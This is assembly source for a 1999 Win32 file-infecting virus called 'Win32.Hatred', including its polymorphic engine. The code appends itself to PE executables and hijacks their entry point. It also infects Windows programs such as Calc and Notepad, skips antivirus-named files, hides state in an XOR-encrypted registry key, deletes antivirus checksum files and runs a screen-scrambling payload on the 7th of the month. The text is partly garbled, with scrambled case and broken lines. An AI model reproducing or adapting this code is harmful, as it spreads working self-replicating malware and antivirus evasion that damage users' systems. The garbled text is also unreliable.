Lea EBX, [EBP Offset Filetime]; Restore the File Time
PUSH EBX;
Add EBX, 8;
PUSH EBX;
Add EBX, 8;
PUSH EBX;
Push DWORD PTR [EBP OFFSET HANDLE1];
Call DWORD PTR [EBP _SETFILETIME];
;
MOV EAX, [EBP HANDLE1];
Push Eax; Close The File ...
Call [EBP _CLOSEHANDLE];
;
Push DWORD PTR [EBP OFFSET FileAttributes]; Restore the File Attribs
Push DWORD PTR [EBP OFFSET FILEOFS];
Call [EBP _SETFILEATTRIBUTES];
;
Next_file_exit:;
Popad; Restore Registers and Exit
Ret;
OpenFile Endp;
; ?????????????????????????????????????????? ??????????????????????????
; Infect Opened file?
; ?????????????????????????????????????????? ??????????????????????????
;
; Entry: ESI = Pointer to the file map
InfectFile Proc Near
Pushad;
MOV Eax, DWORD PTR [ESI.OH_FileAlignment]; Save All the needed
MOV DWORD PTR [EBP FileAlign], EAX; VALUES
MOV EAX, DWORD PTR [ESI.OH_SECTIONALIGNMENT];
MOV DWORD PTR [EBP Sectionalign], EAX;
MOV Eax, DWORD PTR [ESI.OH_AddressofentryPoint];
MOV DWORD PTR [EBP OLDEIP], EAX;
MOV EAX, DWORD PTR [ESI.OH_IMAGEBASE];
MOV DWORD PTR [EBP NewImageBase], EAX;
;
MOV EBX, DWORD PTR [ESI.OH_Numberofrvaandsizes]; Let us Locate the
SHL EBX, 3; Last Section
XOR EAX, EAX;
MOV AX, Word Ptr [ESI.NUMBEROFSECTIONS-IMAGE_FILE_HEADER_SIZE]
Dec EAX;
MOV ECX, Image_SECTION_HEADER_SIZE;
Mul ECX;
;
Mov ESI, DWORD PTR [EBP Peheader]; Pe Header Offset
Add ESI, Image_File_Header_Size; Header Length
Add ESI, 60H; OPTIONAL HEADER LEN Add ESI, EBX; Data Directory
Add ESI, EX; All Sections
;
MOV [EBP LASTSECTION], ESI; SAVE LAST Section Addr
MOV EDI, DWORD PTR [ESI.SH_POINTERTORAWDATA]; GET POINTER TO RAW DATA
Add EDI, DWORD PTR [EBP MAPAddress]; and align it to memory
Add Edi, DWORD PTR [ESI.SH_VIRTUALSIZE]; and THEN ADD VIRTUAL
MOV [EBP SMTH], EDI; SIZE AND SAVE THE VALUE
;
Pushad; let us Copy Our Virus
Lea ESI, DWORD PTR [EBP START]; There ...
MOV ECX, Virussize;
REP MOVSB;
POPAD;
;
Add DWORD PTR [ESI.SH_VIRTUALSIZE], Virussize; Increase the Sizes
Add DWORD PTR [ESI.SH_SIZEOFRAWDATA], Virussize; (Virtual and Physical)
Or dword ptr [ESI.SH_CHARACTERISTICS], 0C0000040H; Make Section R / W
;
Mov Eax, [ESI.SH_SIZEOFRAWDATA]; Align SizeOfrawData
MOV ECX, DWORD PTR [EBP FileAlign]; To the file
Push eax; alignment
PUSH ECX;
XOR EDX, EDX;
Div ECX;
POP ECX;
SUB ECX, EDX;
POP EAX;
Add Eax, ECX;
Mov DWORD PTR [ESI.SH_SIZEOFRAWDATA], Eax; and Store IT
;
MOV ESI, DWORD PTR [EBP Peheader];
MOV Eax, DWORD PTR [ESI 50H]; Get OldsizeOfimage
Add Eax, Virussize; Increase It and then
MOV ECX, DWORD PTR [EBP Sectionalign]; Align It To The Section
Push eax; alignment
PUSH ECX;
XOR EDX, EDX;
Div ECX;
POP ECX;
SUB ECX, EDX;
POP EAX;
Add Eax, ECX;
MOV DWORD PTR [ESI 50H], EAX;
;
MOV EDI, [EBP LastSECTION]; Point Last Section
;
Mov Eax, [edi.sh_pointertorawdata]; Pointer to Raw Data
Add eax, [edi.sh_virtualsize]; Plus last section size
MOV [EBP FileSize], EAX; is the filesis. align
MOV ECX, DWORD PTR [EBP FileAlign]; It to the file
Push eax; alignment
PUSH ECX;
XOR EDX, EDX;
Div ECX; POP ECX;
SUB ECX, EDX;
POP EAX;
Add Eax, ECX;
MOV DWORD PTR [EBP FileSize], EAX; and store it
;
Mov Eax, [edi.sh_virtualaddress]; let us Locate the New
Add Eax, [EDI.SH_VIRTUALSIZE]; EIP ...
Sub eax, virussize;
MOV DWORD PTR [ESI 28H], EAX; ... and store it !!
WE finished infecting the file. Now let us preted to call the poly
ENGINE:
MOV EBX, EBX; EBX = Code to Decrypt At
Add EBX, [EBP ImageBase]; Runtime
Add ebx, offset start_of_code-offset start; (Adjustment)
MOV ESI, DWORD PTR [EBP SMTH]; ESI = Code to Encrypt in
Add ESI, Offset Start_Of_code-Offset Start; Memory
Mov EDI, ESI; EDI = Where to Place THE
Add Edi, Offset Decrypt-Offset Start_OF_CODE; Decryptor
MOV ECX, END_OF_CODE-START_OF_CODE; ECX = Size Of Code to Crypt
SHR ECX, 2; Be Sure Is Divisible By
SHL ECX, 2; 4
;
Call Mof32; Call Mof32
;
MOV EDI, [EBP THE_END]; Go to the end
Sub ESI, EDI; and Store A JMP There ...
MOV Al, 0E9H;
Stosb;
Mov Eax, ESI; a jmp to the beginning
Sub Eax, 5; The Real Code
Stosd;
;
MOV ECX, DWORD PTR [EBP OFFSET FILESIZE]; PUT ZEROES Until the End
Add ECX, [EBP MAPAddress]; of File So No Mess IS
Sub ECX, EDI; FOUND THERE (THE Mess
MOV EDI, [EBP END_END];
MOV Al, 0; Which Remains is Because
REP Stosb; of the alignment)
Popad; Restore Registers
;
MOV EDI, DWORD PTR [EBP SMTH]; MUTATE INITIAL JUMP
Add Edi, Offset Jump_code-offset start;
MOV EAX, DWORD PTR [EBP First_INTEND]; with the first inten
Add DWORD PTR [EDI 1], EAX;
Ret;
Infectfile ENDP;
; ?????????????????????????????????????????? ??????????????????????????
;? Check if the file is good for infection?
; ?????????????????????????????????????????? ??????????????????????????
; Entry: = Pointer to FileName
;
Return: Cf Clear IF File IS OK
; Cf set if file cannot be infreaded
Validatefile proc NEAR;
Pushad;
;
XCHG ESI, EDI;
Lea ESI, [EBP AVOID_LIST]; Point Avoid List
;
REPEAT_CHECK_FILES:;
PUSH ESI;
Call [EBP _LSTRLEN]; Get Length of String
MOV ECX, EAX;
;
PUSH ESI EDI;
REP CMPSB; Compare String
JE file_INVALID;
POP EDI ESI;
Add ESI, ESI; Go to the next Name
Inc ESI;
CMP BYTE PTR [ESI], 0FFH; The end?
JE file_valid;
JMP REPEAT_CHECK_FILES;
;
File_valid:;
CLC; File Can Be Infected
POPAD;
Ret;
;
File_INVALID:;
POP EDI ECX;
STC; File Cannot Be Infected
POPAD;
Ret;
Validatefile ENDP;
;
Avoid_list label;
DB 'TB', 0;
DB 'f-', 0;
DB 'AW', 0;
DB 'AV', 0;
DB 'NAV', 0;
DB 'PAV', 0;
DB 'RAV', 0;
DB 'NVC', 0;
DB 'fpr', 0;
DB 'DSS', 0;
DB 'IBM', 0;
DB 'inoc', 0;
DB 'Anti', 0;
DB 'SCN', 0;
DB 'vsaf', 0;
DB 'vswp', 0;
DB 'Panda', 0;
DB 'drweb', 0;
DB 'FSAV', 0;
DB 0FFH;
; ?????????????????????????????????????????? ??????????????????????????
;? Retrieve or set the laast checked Directory from the registry?
; ?????????????????????????????????????????? ??????????????????????????
;
; Entry: Nothing
;
; RETURN: EDI = Pointer to the Directory
SetinitialKey Proc Near;
Pushad;
;
Lea Eax, DWORD PTR [EBP OFFSET Key_Handle]; First Let Us Open
Push Eax; The key we have
Push key_all_access; Our value set up in
PUSH 0;
Lea Eax, DWORD PTR [EBP OFFSET Key]; Push EAX;
Push HKEY_CURRENT_USER;
Call [EBP _REGOPENKEYEXA];
CMP EAX, 0;
JNE SET_NEW_KEY; if Error -> CREATE ...
;
Lea Eax, DWORD PTR [EBP OFFSET Key_LEN]; Now, After The Key IS
Push Eax; Open, Lets Query Our
Lea Eax, DWORD PTR [EBP OFFSET Key_Data]; Hatred Value ...
Push Eax;
Lea Eax, DWORD PTR [EBP OFFSET Key_TYPE];
Push Eax;
PUSH 0;
Lea Eax, DWORD PTR [EBP Key_Name];
Push Eax;
MOV EAX, DWORD PTR [EBP Key_Handle];
Push Eax;
Call [EBP _REGQUERYVALUEEXA];
CMP EAX, 0; if Found, Then IT's OK
JE Key_was_found;
;
MOV EAX, DWORD PTR [EBP Key_Handle]; Close Key Handle
Push Eax; (Carefull!)
Call [EBP _CLOSEHANDLE];
;
SET_NEW_KEY:; OtherWise Create Key / Val
IF TestOnly; if we must set a new
Else; Key Then We shop Make
Call Directinfect; The Direct Infection
Endif; Now ...
MOV [EBP SKIP], 1;
LEA EAX, DWORD PTR [EBP DISPOSITION]; new? or existing?
Push Eax;
Lea Eax, DWORD PTR [EBP Key_Handle]; New Key Handle
Push Eax;
Push 0; Security Attrib
Push key_all_access; All Access
Push REG_OPTION_NONVOLATILE; DON 'T DESTROY AT Reboot
Push 0; Class
Push 0; reserved
Lea Eax, DWORD PTR [EBP Key]; Ptr To New Key Name
Push Eax;
Push HKEY_CURRENT_USER; PARENT KEY
Call [EBP _REGCREATEKEYEXA];
;
Push 4; New Value Length
Lea Eax, DWORD PTR [EBP System_Paths]; New Value Pointer
Call cryptKey;
;
Subsequent_call:;
Push Eax;
Push Reg_SZ; Make it string
Push 0; reserved
Lea Eax, DWORD PTR [EBP Key_Name]; Key Name for Value
Push Eax;
MOV EAX, DWORD PTR [EBP Key_Handle];
Push Eax; New Key Handle
Call [EBP _REGSETVALUEEXA];
Lea EDI, DWORD PTR [EBP System_Paths]; MOV EAX, EDI;
Call cryptKey;
JMP EXIT_REGISTRY;
;
Key_was_found:;
MOV [EBP SKIP], 0;
Lea EDI, DWORD PTR [EBP Key_Data];
MOV EAX, EDI;
Call CryptKey; Decrypt Key
Push Edi; Is The Found Key
Call [EBP _SETCURRENTDIRECTOREA]; STILL a VALID DIR?
OR EAX, EAX;
JZ set_new_key; if not reset ...
;
EXIT_REGISTRY:;
MOV EAX, DWORD PTR [EBP Key_Handle]; Close this handle TOO
Push Eax;
Call DWORD PTR [EBP _CLOSEHANDLE];
MOV DR0, EDI;
POPAD;
MOV EDI, DR0; and RETURN with EDI
Ret; Pointing the Path
SetinitialKey Endp;
;
SetsubsequentKey Proc Near;
Pushad;
Lea EAX, [EBP OFFSET Key_Data];
Push Eax;
PUSH 260;
Call [EBP _GETCURRENTDIRECTORYA]; Retrieve Last Checked
Lea EAX, [EBP OFFSET Key_Data]; DIR
Call CryptKey; Crypt IT
PUSH 4;
Lea Eax, [EBP OFFSET Key_Data]; and set it in the
JMP subsequent_call; registry
SetsubsequentKey Endp;
;
CryptKey Proc Near; EAX = Address; this Crypts or Decrypts
Push EAX ECX; The Key With A Simple
Push eax; xor algorithm. However
Push eax; using regedit you cannot
Call [EBP _LSTRLEN]; See the Encrypted Key.
MOV ECX, EAX; Instead a Bunch of
POP Eax; Black Squares Will
Crypt_key:; Appear As Our Key's
XOR BYTE PTR [EAX], 'H'; Value.
Inc EAX;
LOOP CRYPT_KEY;
POP ECX EAX;
Ret;
CryptKey Endp;
;
HKEY_CURRENT_USER EQU 80000001H; WHERE TO CREATE Key
Reg_sz EQU 1; Create String Values
REG_OPTION_NONVOLATILE EQU 0; Do Not Destroy At Reboot
Key_all_access EQU 0F003FH; All Access
Disposition DD 0; ...
Key_Handle DD 0; VALUES RET. by CREATE
Key DB "Control Panel / Cursors", 0; New Key
Key_Data DB 260 DUP (0); New ValueKey_LEN DD 260;
Key_Name DB "dertah", 0; key name
Key_TYPE DD 0;
; ?????????????????????????????????????????? ??????????????????????????
?? GRAPHICAL PAYLOAD?
; ?????????????????????????????????????????? ??????????????????????????
PayLoad Proc Near
Lea Eax, [EBP OFFSET SYSTIME]; Get The System Time
MOV EDI, EAX;
Push Eax;
Call [EBP _GETSYSTEMTIME];
MOV EAX, DWORD PTR [EDI 4];
And Eax, 0FFFF0000H;
SHR EAX, 10H; EAX = Day of Month ...
CMP EAX, 7; Is IT 7?
JNE NO_PAYLOAD;
;
Push 1000h; Display a Window
Lea EAX, [EBP WINTITLE];
Push Eax;
Lea Eax, [EBP WINTEXT];
Push Eax;
PUSH 0;
Call [EBP _MESSAGEBOXA];
;
XOR EAX, EAX; Get Screen Device Context
Push Eax;
Call [EBP _GETDC];
MOV [EBP Screen], EAX;
;
LOOP_:;
Mov Eax, 2000; Get A Random X-Axis Place
Call Brandom32;
MOV [EBP X], EAX;
Mov Eax, 2000; Get A Random Y-Axis Place
Call Brandom32;
MOV [EBP Y], EAX;
Push 0; Erase Area Flag
Push [EBP X];
Push [EBP Y];
Push [EBP Screen];
Push 1; Area Size
Push 1; Area Size
INC [EBP X];
INC [EBP Y];
Push [EBP X];
Push [EBP Y];
Push [EBP Screen];
Call [EBP _BITBLT]; Do IT ...
;
Push 01bh; Check if esc Was press ...
Call [EBP _GetasyncKeyState];
OR EAX, EAX;
JNE FINISH;
JMP loop_;
;
FINISH:;
NO_PAYLOAD:;
Ret;
Wintitle DB "Win32.Hatred by Lord Julus (C) 1999, 0
Wintext DB 13, 10, 13, 10
DB "Today is the 7th !! Today is the day of hate !!"
DB 13, 10, 13, 10
DB "with Heart Feel Hatred! Black Blood Runs Thru My VEINS!"
DB 13, 10, 13, 10
DB "HATRED !!!! Hatred !!!!"
DB 13, 10, 13, 10dB "(Escape is your escape)"
DB 13, 10, 0
X DD 0
Y DD 0
Screen DD 0
SYSTIME DD 0
PayLoad Endp
; ?????????????????????????????????????????? ??????????????????????????
:? Erase Checksum Files?
; ?????????????????????????????????????????? ??????????????????????????
ERASECHECKSUMS proc NEAR;
Pushad;
Lea EDI, [EBP Offset SearchFiles]; Point To Search Record
Lea ESI, [EBP OFFSET AV_LIST]; Point AV FILES LIST
;
Locate_Next_AV:;
CMP BYTE PTR [ESI], 0FFH;
JE AV_KILL_DONE;
MOV EAX, ESI;
CMP BYTE PTR [EAX], 0FFH; is this the end?
JE AV_KILL_DONE;
Push Edi; Push Search Record Address
Push Eax; Push FileName Address
Call [EBP _FINDFIRSTFILEA]; FIND First Match
CMP Eax, 0FFFFFFFFFH; Check for Eax = -1
JE next_av_file;
Push Eax;
Lea EBX, [EDI.FileName]; ESI = Pointer to FileName ...
Push Ebx; Push FileName Address
Call [EBP _DELETEFILEA]; DELETE FILE!
;
Call [EBP _FINDCLOSE]; Close the Find Handle
;
Next_AV_FILE:;
Push EDI;
MOV EDI, ESI;
MOV Al, 0;
MOV ECX, 100;
Repunz scaSB;
MOV ESI, EDI;
POP EDI;
JMP locate_next_AV;
;
AV_KILL_DONE:;
POPAD;
Ret;
ERASECHECKSUMS ENDP;
;
AV_List DB "Avp.crc", 0; The AV Files To Kill
DB "ivp.ntz", 0;
DB "Anti-vir.dat", 0;
DB "chklist.ms", 0;
DB "chklist.cps", 0;
DB "smartchk.ms", 0;
DB "smartchk.cps", 0;
DB 0FFH;
; ?????????????????????????????????????????? ??????????????????????????
Direct Infect Routine?
; ?????????????????????????????????????????? ??????????????????????????
Directinfect Proc Near; Direct ASS-Kick
Pushad;
;
LEA ESI, [EBP TEMPDIR];
PUSH 260;
Push ESI; CALL [EBP _GETWINDOWSDIRECTORYA]; Find Windows Dir
;
OR EAX, EAX;
JZ quit;
;
PUSH ESI;
Call [EBP _SETCURRENTDIRECTORYA]; Change to It ...
;
Lea ESI, [EBP DIRECT_LIST]; Take The Files ...
;
Direct_loop:;
Call OpenFile; Open & Infect
MOV EDI, ESI;
MOV Al, 0;
MOV ECX, 100;
RepNZ scaSB; Next File
CMP BYTE PTR [EDI], 0FFH;
Je quit;
MOV ESI, EDI;
JMP Direct_loop;
;
Quit:;
POPAD;
Ret;
Directinfect endp;
;
IF debug;
Direct_list label;
DB 'CDPlayer.xex', 0;
DB 'Calc.xex', 0;
DB 'PBRUSH.XEX', 0;
DB 'MPlayer.xex', 0;
DB 'NOTEPAD.XEX', 0;
DB 'winhlp32.xex', 0;
DB 0FFH;
Else;
Direct_list label;
DB 'CDPlayer.exe', 0;
DB 'Calc.exe', 0;
DB 'PBRUSH.EXE', 0;
DB 'MPlayer.exe', 0;
DB 'NOTEPAD.EXE', 0;
DB 'WinHlp32.exe', 0;
DB 0FFH;
Endif;
; ?????????????????????????????????????????? ??????????????????????????
:? Equates, Structures, Data?
; ?????????????????????????????????????????? ??????????????????????????
Image_dos_header struct; dos .exe header
MZ_MAGIC DW?; MAGIC NUMBER
MZ_CBLP DW?; BYTES ON LAST Page Of File
MZ_CP DW?; Pages In File
MZ_CRLC DW?; Relocations
MZ_CPARHDR DW?; SIZE OF Header in Paragraphs
MZ_MINALLOC DW?; Minimum Extra Paragraphs Needed
MZ_MAXALLOC DW?; Maximum Extra paragraphs needed
MZ_SS DW?; Initial (Relative) SS Value
MZ_SP DW?; Initial SP Value
MZ_CSUM DW?; Checksum
MZ_IP DW?; Initial IP Value
MZ_CS DW?; Initial (Relative) CS Value
MZ_LFARLC DW?; File Address of Relocation Table
MZ_ovno dw?; Overlay number
MZ_RES DW 4 DUP (?); Reserved Words
MZ_OEMID DW?; OEM Identifier (for MZ_OemInfo) MZ_OEMINFO DW?; OEM Information; MZ_OEMID Specific
MZ_RES2 DW 10 DUP (?); Reserved words
MZ_LFANEW DD?; File Address of New Exe HEADER
Image_dos_header ends;
Image_dos_header_size = size image_dos_header
;
Image_file_header struct; portable exe file
PE_MAGIC DD?;
Machine DW?; Machine Type
NUMBEROFSECTIONS DW?; NUMBER OF SECTIONS
TIMEDASTAMP DD?; DATE AND TIME
Pointertosymboltable dd?; Pointer to Symbols
NUMBEROFSYMBOLS DD?; NUMBER OF SYMBOLS
SIZEOFOPTIONALHEADER DW?; SIZE OF OPTIONAL HEADER
CHARACTERISTICS DW?; File CHARACTERISTICS
Image_file_header ends;
Image_file_header_size = size image_file_header
;
Image_data_directory struct; Image Data Directory
DD_VIRTUALADDRESS DD?; Virtual Address
DD_SIZE DD?; Virtual Size
Image_data_directory ends ;;;;;;;;;
;
Image_directory_entries struct; All Directories
DE_EXPORT image_DATA_DIRECTORY?;
DE_IMPORT image_DATA_DIRECTORY?;
DE_RESOURCE Image_DATA_DIRECTORY?;
DE_EXCEPTION IMAGE_DATA_DIRECTORY?;
DE_SECURITY Image_DATA_DIRECTORY?;
DE_BASERELOC image_DATA_DIRECTORY?;
DE_DEBUG IMAGE_DATA_DIRECTORY?;
DE_COPYRIGHT image_DATA_DIRECTORY?;
DE_GLOBALPTR image_DATA_DIRECTORY?;
DE_TLS image_DATA_DIRECTORY?;
DE_LOADCONFIG IMAGE_DATA_DIRECTORY?;
DE_BOUNDIMPORT Image_DATA_DIRECTORY?;
DE_IAT image_DATA_DIRECTORY?;
Image_directory_entries ends;
Image_numberof_directory_entries = 16;
;;;;;;;;;;;
Image_optional_header struct; Optional Header
OH_MAGIC DW?; Magic Word
OH_MAJORLINKERVERSON DB?; Major Linker Version
OH_MINORLINKERVERSON DB?; Minor Linker Version
OH_SIZEOFCODE DD?; SIZE OF CODE Section
OH_SIZEOFINIALIZEDDATA DD?; INITIALIZED DATAOH_SIZEOFUNIZED DATA DD?; Uninitialized Data
OH_ADDRESSOFENTRYPOINT DD BYTE PTR?; INITIAL EIP
OH_BASEOFCODE DD BYTE PTR?; Code Virtual Address
OH_BASEOFDATA DD BYTE PTR?; Data Virtual Address
OH_IMAGEBASE DD BYTE PTR?; BASE OF Image
OH_SECTIONALIGNMENT DD?; Section Alignment
OH_FILEALIGNMENT DD?; File Alignment
OH_MAJorOperatingSystemVersion dw?; Major OS
OH_MINOROPERATINGSYSTEMVERSION DW?; Minor OS
OH_MAJORIMAGEVERSION DW?; Major Image Version
OH_MINORIMAGEVERSION DW?; Minor Image Version
OH_MAJORSUBSYSTEMVERSION DW?; Major Subsys Version
OH_MINORSUBSYSTEMVERSION DW?; Minor Subsys Version
OH_WIN32VERSIONVALUE DD?; Win32 Version
OH_SIZEOFIMAGE DD?; SIZE OF Image
OH_SIZEOFHEADERS DD?; SIZE OF HEADER
OH_CHECKSUM DD?; Unused
OH_SUBSYSTEM DW?; SUBSYSTEM
OH_DLLCHARACTERISTICS DW?; DLL CHARACTERISTIC
OH_SIZEOFSTACKRESERVE DD?; Stack Reserve
OH_SIZEOFSTACKCOMMIT DD?; Stack Commit
OH_SIZEOFHEAPRESERVE DD?; Heap Reserve
OH_SIZEOFHEAPCOMMIT DD?; HEAP COMMIT
OH_LOADERFLAGS DD?; Loader Flags
OH_NUMBEROFRVAANDSIZES DD?; Number Of Directories
Union; Directory Entries
OH_DATADIRECTORY Image_DATA_DIRECTORY /
Image_numberof_directory_entries dup (?)
OH_DIRECTORYENTRIES IMAGE_DIRECTORY_ENTRIES?
ENDS;
Image_optional_header ends;
Image_optional_header_size = size image_optional_header
;
Image_section_header struct; section HDR.
SH_NAME DB 8 DUP (?); Name
Union;
SH_PHYSICALADDRESS DD BYTE PTR?; Physical Address
SH_VIRTUALSIZE DD?; Virtual Size
ENDS;
SH_VIRTUALADDRESS DD BYTE PTR?; Virtual Address
SH_SIZEOFRAWDATA DD?; RAW DATA SIZE
SH_POINTERTORAWDATA DD BYTE PTR?; POINTER TO RAW DATASH_POINTERTORELOCATIONS DD BYTE PTR?; ...
SH_POINTERTOLINENUMBERS DD BYTE PTR?; ... NOT REALLY USED
SH_NUMBEROFRELOCATIONS DW?; ....
SH_NUMBEROFLINENUMBERS DW? ;.;
SH_CHARACTERISTICS DD?; FLAGS
Image_section_header ends;
Image_section_header_size = size image_section_header
;
Image_import_by_name struct; import by name data type
IBN_HINT DW 0; HINT Entry
IBN_NAME DB 1 DUP (?); Name
Image_import_by_name ends;
;
Image_thunk_data struct; thunk data
Union;
TD_ADDRESSOFDATA DD Image_IMPORT_BY_NAME PTR?; Ptr To Image_Import_BY_NAME STRUCTURE
TD_ORDINAL DD?; Ordinal Ored with Image_Ordinal_Flag
TD_FUNCTION DD BYTE PTR?; PTR To Function (I.E. Function Address After Program Load)
TD_FORWARDERSTRING DD BYTE PTR?; PTR to a Forwarded API function.
ENDS;
Image_thunk_data ends ;;;;;;;;;
;
Image_import_descriptor struct; import descryptor
Union;
ID_CHARACTERISTICS DD?; 0 for Last Null Import Descriptor
ID_ORIGINALFIRSTTHUNK DD image_thunk_data ptr?; RVA to Original UNBOUND IAT
ENDS;
ID_TIMEDASTAMP DD?;
ID_FORWARDERCHAIN DD?; -1 if no forwarders
ID_NAME DD BYTE PTR?; RVA to Name of Imported DLL
ID_FIRSTTHUNK DD image_thunk_data ptr?; RVA to IAT
Image_import_descriptor ends;
Image_import_descriptor_size = size image_import_descriptor
Image_export_directory struct; Export Directory Type
ED_CHARACTERISTICS DD?; FLAGS
Ed_TIMEDASTAMP DD?; DATE / TIME
ED_MAJORVERSION DW?; Major Version
ED_MINORVERSION DW?; Minor Version
Ed_Name DD BYTE PTR?; PTR to Name of Exported DLL
Union;
ED_BASE DD?; BASE
ED_BASEORDINAL DD?; Base Ordinal
ENDS;
ED_NUMBEROFFUNCS DD?; NUMBER OF EXPORTED FUNITTER
Ed_NUMBEROFNAMES DD?; Number of Exported Names
Ed_Numberofordinals DD?; Number of Exported Ordinals
ENDS;
ED_ADDRESSOFFUNCTION DD DWORD PTR?; PTR TO Array Of Function Addresses
Ed_AddressofNames DD DWORD PTR?; PTR TO Array of (Function) Name Addresses
Union;
Ed_addressofnameordinals Dd Word Ptr?; Ptr To Array of Name Ordinals
Ed_Addressofordinals Dd Word Ptr?; Ptr To Array of Ordinals
ENDS;
Image_export_directory ends;
Filetime Struc; Filetime Structure
FT_DWLOWDATETIME DD?;
Ft_dwhighdatetime dd?;
Filetime Ends;
;
Win32_find_data struct;
FileAttributes dd?; Attributes
CreationTime FileTime?; Time of Creation
Last AccessTime FileTime?; Last Access Time
Lastwritetime filetime?; Last ModificationM
FileSizeHigh Dd?; FileSize
FileSizelow DD?; - "-"
RESERVED0 DD?;
RESERVED1_ DD?;
FileName DB 260 DUP (?); Long filename
AlternateFileName DB 13 DUP (?); SHORT FileName
DB 3 DUP (?); dword padding
Win32_find_data ends;
MAX_PATH = 260
K32 DD 0
KERNEL32_NAME DB "kernel32.dll", 0
Advapi32_name DB "Advapi32.dll", 0
USER32_NAME DB "User32.dll", 0
GDI32_NAME DB "GDI32.DLL", 0
NewImageBase Label
ImageBase DD 00400000H
GetModuleHandle DB "getModuleHandlea"
getModuleHandlelen = $ -offset getModuleHandle
GetProcaddress DB "getProcaddress", 0
GetProcaddresslen = $ -offset getProcaddress
ScannedDirs DD 0
SearchRec Win32_Find_Data
SearchFiles Win32_Find_Data
Handle DD 0
Handle1 DD 0
MapHandle DD 0
SearchHandle DD 0
Signal DD 0
FILES DD 0
MapAddress DD 0
FILSIZE DD 0
Skip DB 0
Curdir DB 260 DUP (0)
Tempdir DB 260 DUP (0)
Filetime DQ 0, 0, 0Virussize EQU END-START
FileAlign DD 0
SectionAlign DD 0
Oldeip DD 0
PEHEADER DD 0
LastSection DD 0
Deltahandle DD 0
SMTH DD 0
FILEOFS DD 0
FileAttributes DD 0
; ------------------- Kernel32 Apis
K32_API_NAMES LABEL
DB "getModuleHandlea", 0
DB "EXIXTPROCESS", 0
DB "globalalloc", 0
DB "globalfree", 0
DB "getWindowsDirectorya", 0
DB "getsystemdirectorya", 0
DB "getcurrentdirectorya", 0
DB "setcurrentdirectorya", 0
DB "Findfirstfilea", 0
DB "findnextfilea", 0
DB "getDrivetypea", 0
DB "closehandle", 0
DB "FindClose", 0
DB "CreateFilea", 0
DB "CreateFilemappinga", 0
DB "MapViewOffile", 0
DB "unmapviewoffile", 0
DB "setfilepointer", 0
DB "STENDOFFILE", 0
DB "getfilesize", 0
DB "lstrlen", 0
DB "setfiletime", 0
DB "getfiletime", 0
DB "getProcaddress", 0
DB "flushviewoffile", 0
DB "getLastError", 0
DB "getSystemTime", 0
DB "getfileattributesa", 0
DB "setfileAttributesa", 0
DB "deletefilea", 0
DB "isdebuggerpresent", 0
DB 0FFH
K32_API_ADDRS Label
_GetModuleHandlea DD 0
_Exitprocess DD 0
_GlobalAlloc DD 0
_GlobalFree DD 0
_GetWindowsDirectorya DD 0
_GetsystemDirectorya DD 0
_GetcurrentDirectorya DD 0
_SetCurrentDirectorya DD 0
_Findfirstfilea DD 0
_FindNextFilea DD 0
_GetdriveTypea DD 0
_CloseHandle DD 0
_FindClose DD 0
_CreateFilea DD 0
_CreateFilemappinga DD 0
_MapViewoffile DD 0
_UnmapViewoffile DD 0
_SetFilePointer DD 0
_Seetendoffile DD 0
_GetFileSize DD 0
_LSTRLEN DD 0
_SETFILETIME DD 0
_GetFileTime DD 0_GETPROCADDRESS DD 0
_FlushViewoffile DD 0
_Getlasterror DD 0
_GetsystemTime DD 0
_GetfileAttributes DD 0
_SetFileAttributes DD 0
_Deletefilea DD 0
_ISDEBUGERPRESENT DD 0
; ------------------ Advapi32 APIS
A32_API_NAMES LABEL
DB "regcreateKeyexa", 0
DB "RegSetValueexa", 0
DB "RegQueryValueexa", 0
DB "regopenkeyexa", 0
DB 0FFH
A32_API_ADDRS Label
_REGCREATEKEYEXA DD 0
_RegSetValueexa DD 0
_REGQUERYVALUEEXA DD 0
_REGOPENKEYEXA DD 0
; ------------------ User32 Apis
U32_API_NAMES LABEL
DB "MessageBoxa", 0
DB "getdc", 0
DB "getasynckeystate", 0
DB "EXITWINDOWSEX", 0
DB 0FFH
U32_API_ADDRS Label
_MessageBoxa DD 0
_Getdc DD 0
_GetasyncKeyState DD 0
_Exitwindowsex dd 0
; ------------------- GDI32 APIS
G32_API_Names Label
DB "Bitblt", 0
DB 0FFH
G32_API_Addrs Label
_Bitblt DD 0
IF debug;
Filemasks DB "Goat * .exe", 0; For Debug Mode ONLY
DB "Goat * .scr", 0; Goat Files Are Searched
DB 0FFH;
Else;
Filemasks DB "* .exe", 0;
DB "* .scr", 0;
DB 0FFH;
ENDIF
CopyRight DB "Win32.HatrED v.1.0"
DB "(c) 1999 by Lord Julus
; ????????????????????? ?????????? ????????? ? ???????????
????????????????????????????????????????
; ????????????????????? ?????????? ????????? ? ???????????
; ????? ?????
??? M? U? L? T? I? P? L? EF? P? C? O? D? EF? A? N? T? A? S? I? E? S 3? 2 b? I? T???
; ????? ?????
; ????? a polymorphic engine write by ?????
;??????
; ????? Lord julus - 1999 (c) ?????
; ????????????????????? ?????????? ????????? ? ???????????
;????????????????????????????????????; ?? ????? ????? ??? ????? ????????????????????,?
;
Version 2.5
;
Parameters on Entry:
;
ESI = Offset to code to encrypt
EDI = Offset to the Decryptor Place
; Ebx = address of the offset of code to decrypt at runtime
ECX = Length of code to Decrypt
;
Returns: Nothing
Mof32 proc near; Here Is The Actual Poly Engine
Pushhad; body
First Let's Encrypt The Area That Will Be Decrypted Later
Call choose_random_registers; choise the random registers to us
MOV DWORD PTR [EBP CodeAddr], EBX
Push EDI; Save Decryptor Place
Push Ecx; Save Code in Bytes
MOV EBX, ESI;
Add EBX, ECX; EBX POINTS to the end
SUB EBX, 4; Minus 1 DWORD
SHR ECX, 2; WE Work on DWORDS
Push EBX ECX;
Call Random32; Get a Random 32bit DWORD in EAX
MOV DWORD PTR [EBP Offset Key], EAX; Which Is The Encryption Key
Call random32;
MOV DWORD PTR [EBP Offset KeyValue], EAX; THE Key Increment
Mov Eax, 20h; The Static Key.
Call Brandom32;
Inc EAX;
MOV DWORD PTR [EBP Offset Key2], EAX
MOV EAX, 3;
Call Brandom32; Get a Random Value Between 0-3
MOV DWORD PTR [EBP Offset Op1], EAX; The Encryption Method
MOV EAX, 2;
Call Brandom32;
MOV DWORD PTR [EBP Offset OP2], EAX; The Static Key Method
MOV EAX, 3;
Call Brandom32;
MOV DWORD PTR [EBP Offset Op3], EAX; The 'Next Code' Method
MOV EAX, 3;
Call Brandom32;
MOV DWORD PTR [EBP Offset OP4], EAX; The Operation over the key
;
POP ECX EBX; Restore Length and Pointer
MOV EAX, [EBP Key]; PUT Key in Eax
MOV [EBP Offset Codelength], ECX;
First We Encrypt The Code 0 1 2
